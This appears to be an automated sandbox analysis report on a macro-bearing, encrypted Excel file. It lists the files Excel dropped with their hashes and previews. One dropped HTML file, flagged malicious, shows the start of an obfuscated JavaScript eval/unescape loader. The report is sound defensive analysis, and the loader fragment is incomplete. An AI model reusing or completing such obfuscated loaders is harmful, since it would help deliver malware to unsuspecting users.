          Preview:....l...........................Z....G.. EMF....,V..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................&...........................%...........................6.......#.......&...........................%...........L...d...........".......................!...........
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):8084
          Entropy (8bit):2.5551694039574895
          Encrypted:false
          SSDEEP:96:j+RiOO++Z39FAcRwxBdEtzBfCC7Boff8oBJ6ANQ4HJV:jtGNOzBArH
          MD5:721E8AAC81F0A6D4659831CB8194D668
          SHA1:6BE0CEFAEC9F0B1EAD9DE03C8D4679767CF8B549
          SHA-256:E52DF310BB20C42F738A3C8E03ED4110CB795B8A07AE5D4E474EA075564B1622
          SHA-512:24CACEED3153493E34988C35628FAA2C198C9B13AFDD8ABC214EFBA0ACCD0579BADCD5EB0F76F5BDA16D3A279DB4DF4BB218ABD5FFD751C6E62676BD1AAEF2E7
          Malicious:false
          Preview:....l.........../...n............9...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o...'.......................%...........................................................L...d...........>...............q.......!..............?...........?................................R...p...................................A.r.i.a.l...............................................
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):1293620
          Entropy (8bit):4.563127917199792
          Encrypted:false
          SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
          MD5:F71C973B5E362DFD6408D6C009E5643E
          SHA1:24B3CE67B31BFD4791287932206D54C73489424E
          SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
          SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
          Malicious:false
          Preview:....l...........%...............@m..?... EMF....4....!..1...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):109544
          Entropy (8bit):4.282675970330063
          Encrypted:false
          SSDEEP:768:I4KlWqWxZiDQ4hHdCUeHxCDJB9Cnh3KCg0F9BV:I42WxF4MyeKCV
          MD5:F7B9A8F20E64B2CB6B572BCBA5866236
          SHA1:2F092A0A518639332BE76BF60DBB966AC331D356
          SHA-256:72447B22A4BBC05B9E9183DF2ADB712AB51C3A45C6247C2303024197D1623F57
          SHA-512:4A78624A9EB02208F3F30D03CC53EBE00BDD2C59E8F7719E35E706D51CD2F8D0D330BE6D6FAD2A9652536F888CB99E0CBE1E3B97A05EA65CB5914C37C501B728
          Malicious:false
          Preview:....l...............r............C...a.. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:HTML document, ASCII text, with very long lines (8810), with CRLF line terminators
          Category:dropped
          Size (bytes):8896
          Entropy (8bit):2.878591814356277
          Encrypted:false
          SSDEEP:192:tHaCEQ66dDJeum2oum25T6lS5KUJDVUKhC14GVf/Av66dDumAVYxequccVFArb7U:t1EQ66dDJeum2oum25T6lS5KUJDVUKhm
          MD5:DEC3461E0215192337302502C20CFB0C
          SHA1:17508DAB9F30150A7142C73E2D6E280511BC6F9E
          SHA-256:276A35425D98919D79AE668AF841EFC697448B18FF7729FBBC8C2DE034EABBB0
          SHA-512:730335E8A6437279A2494C5C91B28368BAC66FB0D0CAC444DFA0E73460B4ADCE5F06696E6AFF6138DA2C7DD95BB649F8C774CEAE55103AFB6CBD11EB37E65F92
          Malicious:true
          Preview:<Script Language='Javascript'>.. HTML Encryption provided by tufat.com -->.. ..document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%20%0A%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%27%25%36%36%25%37%35%25%36%65%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%32%30%25%36%63%25%33%38%25%33%38%25%36%34%25%36%32%25%36%36%25%33%35%25%36%36%25%33%35%25%33%32%25%33%30%25%32%38%25%37%33%25%32%39%25%32%30%25%37%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%32%25%32%30%25%33%64%25%32%30%25%32%32%25%32%32%25%33%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%34%25%36%64%25%37%30%25%32%30%25%33%64%25%32%30%25%37%33%25%32%65%25%37%33%25%37%30%25%36%63%25%36%39%25%37%34%25%32%38%25%32%32%25%33%31%25%33%37%25%33%30%25%33%32%25%33%36%25%33%37%25%33%37%25%33%39%25%32%32%25%32%39%25%33%62%25%30%61%
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):784
          Entropy (8bit):2.7137690747287806
          Encrypted:false
          SSDEEP:24:YIrNvpKAzLRwcfHGF8AJp9WtAZRJ5poIHWI:YmbfzLmc88AJtfJ52IHV
          MD5:09F73B3902CD3D88E04312787956B654
          SHA1:A6C275F1A65DB02D8A752C614C27E88326447C41
          SHA-256:72971990E5DC57AC8F4F27701158F6DC16E235814EA17DECA95E59CF5F60BC26
          SHA-512:6A68530BA4D4413B587E340CF871162036B6AC60AC0F969C07C70967C3102ADDE3C895BA6F1E2590D9D0C98C253ADFA33CA84E65106C3B56F506FE0E06F0ADA9
          Malicious:false
          Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):512
          Entropy (8bit):0.0
          Encrypted:false
          SSDEEP:3::
          MD5:BF619EAC0CDF3F68D496EA9344137E8B
          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
          Malicious:false
          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Composite Document File V2 Document, Cannot read section info
          Category:dropped
          Size (bytes):53760
          Entropy (8bit):7.37708280426852
          Encrypted:false
          SSDEEP:768:g0VIHbSIpsp3/10qfTaClc4xJNzD/1FCUpeZ8Ak5mhvvYVZAfB:gBHbXpsJ2crDtkFZ8nuXBB
          MD5:07908CA5A3F8DEC1D3B9B68E03873790
          SHA1:6D621056F2F95D8B432B67ECE7224DF3C2ED7BAC
          SHA-256:CDD3DE4C5453B05610F1E08B4E22575B7F730E05500D2D6280A825ECCA092842
          SHA-512:12CEBDE2C752F6A960916FF98536D2F11FF199F3B63F9FA0DEED0D49F681E39C63FAB2EA4A53EAC66108C30E1510C1AFE3B6E84FA608338BC067F9D3CFCF0138
          Malicious:false
          Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...............................................................................
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Composite Document File V2 Document, Cannot read section info
          Category:dropped
          Size (bytes):40960
          Entropy (8bit):7.454434713685174
          Encrypted:false
          SSDEEP:768:p/DwTo0TJZpXXGvdfBwEhkY5qyD4JQ2KK7ilqjqJ:1h0tZp4tSEqhJoHl3
          MD5:7D73D91CF5A0018AA95574C4B5C94EEA
          SHA1:D9B7BCA68250FC9EC127BBE515F5035AEED0E544
          SHA-256:2B46B179D2F362080AB8D41BA91AC5ADB5485D53967337984C44BC5E6C19A5C6
          SHA-512:D51EAE82A995526C3D8E0BF9835AA5D985E6FEC9B42D60E9323CE387877AFE9111FA836F8A3C2A37D374D495FF950F70EE9EECA47E4B5F7F3AACFF4582B83322
          Malicious:false
          Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...................................................................................................................................................................................
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):208896
          Entropy (8bit):6.631121562140281
          Encrypted:false
          SSDEEP:6144:IX8ok3hbdlylKsgwyzcTbWhZFVE+WaxHArWhc7W7PIDqZ8:IsyW+GPJ
          MD5:FD697887998F2D0199EA49B7CC699484
          SHA1:398D260BC36C97E86DF390A2DC007E9CFC26221C
          SHA-256:0A2383CC7229AF50C6781883274B64402DAC4B5A8C2EAF066A66A4672FE53931
          SHA-512:7708D7D6AC390EA82DFA0580756EB72C0E6BB814169E4C1AB3D7765340FF0EAF92C35B79C2DD125068AB698B748CC84B3AD0AB5DD7796988B5AF756858287E7B
          Malicious:false
          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 16 16:19:17 2024, Security: 1
          Category:dropped
          Size (bytes):840192
          Entropy (8bit):7.632398040249081
          Encrypted:false
          SSDEEP:12288:7sFW+iJEUiOIBUzMTSHD3DERnLRmF8DhEPXxpsAQx1Zj+jKEP7PJRp:77BaebARM8AX8Z+j17PJ
          MD5:9F407C2ABB76ACEC06598E170B1B82A5
          SHA1:5E1D29116AE3C2F6BC8449F2ED7A9B4568C86C9F
          SHA-256:A693044F4A5F4A82C2630F8837486DFB6F4E4BF7F64C1999F1F63D33CFA105AC
          SHA-512:4B2CF34842E0EE6BC68CD76D9A81595DCB66FC31A756F5F813195C3FBED0E9D04CF0F01A7CA94A1FC2830BEC237FECA33004CC168FAACECEA697D0E265B25412
          Malicious:false
          Preview:......................>...................................M...................P...Q...R...S...................=...>...Y...............................................................................................................................................................................................................................................................................................................................................................................................................O................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...........<.......................U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 16 16:19:17 2024, Security: 1
          Category:dropped
          Size (bytes):840192
          Entropy (8bit):7.632398040249081
          Encrypted:false
          SSDEEP:12288:7sFW+iJEUiOIBUzMTSHD3DERnLRmF8DhEPXxpsAQx1Zj+jKEP7PJRp:77BaebARM8AX8Z+j17PJ
          MD5:9F407C2ABB76ACEC06598E170B1B82A5
          SHA1:5E1D29116AE3C2F6BC8449F2ED7A9B4568C86C9F
          SHA-256:A693044F4A5F4A82C2630F8837486DFB6F4E4BF7F64C1999F1F63D33CFA105AC
          SHA-512:4B2CF34842E0EE6BC68CD76D9A81595DCB66FC31A756F5F813195C3FBED0E9D04CF0F01A7CA94A1FC2830BEC237FECA33004CC168FAACECEA697D0E265B25412
          Malicious:false
          Preview:......................>...................................M...................P...Q...R...S...................=...>...Y...............................................................................................................................................................................................................................................................................................................................................................................................................O................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...........<.......................U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:ASCII text, with CRLF line terminators
          Category:modified
          Size (bytes):26
          Entropy (8bit):3.95006375643621
          Encrypted:false
          SSDEEP:3:ggPYV:rPYV
          MD5:187F488E27DB4AF347237FE461A079AD
          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
          Malicious:false
          Preview:[ZoneTransfer]....ZoneId=0
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):165
          Entropy (8bit):1.5231029153786204
          Encrypted:false
          SSDEEP:3:sYp5lFltt:sYp5Nv
          MD5:B77267835A6BEAC785C351BDE8E1A61C
          SHA1:FABD93A92989535D43233E3DB9C6579D8174740E
          SHA-256:3B222E766EADC8BC9A8A90AC32FA591F313545B7E8C5D481D378AE307FA798C3
          SHA-512:FFFCBA958E9BD56F284DA19592F124C48B013FCDA2FBE65B3EB38BB644C2B0C978E6DAE99EF213B054813C7212E119B09236A6FFF342D32E52C84DD26DE1E033
          Malicious:true
          Preview:.user ..a.l.f.o.n.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 16 08:27:21 2024, Security: 1
          Entropy (8bit):7.749627073428886
          TrID:
          • Microsoft Excel sheet (30009/1) 47.99%
          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
          File name:Document.xla.xlsx
          File size:1'106'944 bytes
          MD5:d4c6ac821c22be30144711786c736a1a
          SHA1:96e697734dd3dcc47ebbe6bb9d3f1055f096c4f7
          SHA256:ab5152794ca45d670ae3f13de6be92fb686c27705d2df9ce0c00f76717bc61f3
          SHA512:592e25f4e3b9640eec6ad747a421f5498e4f25c74ee3bc47d06a79e4d5c30b0ca487b0518ede189ee491d10d4678a3d0dc1144912e37f798a82d594e967b68bd
          SSDEEP:12288:BumzHJEUiOIBUzMTSmD3DERnLRmF8DgEPbxpsAQx1Zj+juEPEbzYHG2VoUhvzwBF:3BazbARM8D78Z+j5WYHjVvhQccBNM
          TLSH:7E3501D5B28DAB62C606563575F3939E1710AC03D902427B37F8732D2AF76D08607FAA
          File Content Preview:........................>...................................M...................O...P...Q...R...................=...>...X.......m.......o......................................................................................................................
          Icon Hash:35e58a8c0c8a85b9
          Document Type:OLE
          Number of OLE Files:1
          Has Summary Info:
          Application Name:Microsoft Excel
          Encrypted Document:True
          Contains Word Document Stream:False
          Contains Workbook/Book Stream:True
          Contains PowerPoint Document Stream:False
          Contains Visio Document Stream:False
          Contains ObjectPool Stream:False
          Flash Objects Count:0
          Contains VBA Macros:True
          Code Page:1252
          Author:
          Last Saved By:
          Create Time:2006-09-16 00:00:00
          Last Saved Time:2024-12-16 08:27:21
          Creating Application:Microsoft Excel
          Security:1
          Document Code Page:1252
          Thumbnail Scaling Desired:False
          Contains Dirty Links:False
          Shared Document:False
          Changed Hyperlinks:False
          Application Version:786432
          General
          Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
          VBA File Name:Sheet1.cls
          Stream Size:977
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ! . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 21 8f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "Sheet1"
          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = True
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = False
          Attribute VB_Customizable = True
          

          General
          Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet2
          VBA File Name:Sheet2.cls
          Stream Size:977
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` 3 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 fe 33 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "Sheet2"
          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = True
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = False
          Attribute VB_Customizable = True
          

          General
          Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/VBA/ThisWorkbook
          VBA File Name:ThisWorkbook.cls
          Stream Size:985
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 0b bc 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "ThisWorkbook"
          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = True
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = False
          Attribute VB_Customizable = True
          

          General
          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
          VBA File Name:Sheet1.cls
          Stream Size:977
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a2 bc 10 75 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "Sheet1"
          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = True
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = False
          Attribute VB_Customizable = True
          

          General
          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
          VBA File Name:Sheet2.cls
          Stream Size:977
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a2 bc c2 9e 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "Sheet2"
          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = True
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = False
          Attribute VB_Customizable = True
          

          General
          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
          VBA File Name:Sheet3.cls
          Stream Size:977
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a2 bc 42 cd 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "Sheet3"
          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = True
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = False
          Attribute VB_Customizable = True
          

          General
          Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
          VBA File Name:ThisWorkbook.cls
          Stream Size:985
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0
          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a2 bc 2d b4 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "ThisWorkbook"
